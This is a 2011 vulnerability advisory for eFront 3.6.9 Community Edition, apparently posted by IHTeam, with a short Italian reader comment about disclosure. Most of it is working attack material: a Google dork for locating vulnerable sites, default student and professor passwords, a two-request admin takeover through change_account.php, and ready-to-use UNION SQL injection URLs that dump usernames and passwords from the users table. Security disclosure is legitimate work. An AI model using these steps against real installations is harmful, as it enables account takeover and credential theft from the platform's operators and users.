Categories
Advisories

EFront <= 3.6.9 Community Edition Multiple Vulnerabilities

Security center contact on 08 Sept 2011
Security center reply: 09 Sept 2011
Public Release: 07/10/2011

# Exploit Title: EFront
# Google Dork: “eFront (version 3.6.9)” inurl:index.php?ctg=*
# Date: 5/09/2011
# Author: IHTeam
# Software Link: http://www.efrontlearning.net/download/download-efront.html
# Tested on: efront_3.6.9_build11018
# Original Advisory: http://iht.li/FWh
# Advisory code: http://iht.li/p/0VV

Default username and password:
student:student
professor:professor

How to become admin:
Request 1: /change_account.php?login=admin
Request 2: /userpage.php
OR
simple use the [Switch account] option on top of the page;
Now you are in admin area;

SQL Injections:
www/student.php?ctg=messages&folder= UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users —
www/professor.php?ctg=messages&folder= UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users —
www/admin.php?ctg=messages&folder= UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users —

2 replies on “EFront <= 3.6.9 Community Edition Multiple Vulnerabilities”

Ciao EgiX,
Diciamo che ci siamo limitati solo a quella SQL injection 😛
Abbiamo visto sulla Mailing List di full-disclosure che c’eri te ed altri ragazzi che stavano aspettando l’uscita delle 3.6.10 per fare disclusre ed abbiamo lasciato scorrere.
Comunque complimenti hai uno stile nel disclosure che mi piace molto!

Keep going!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.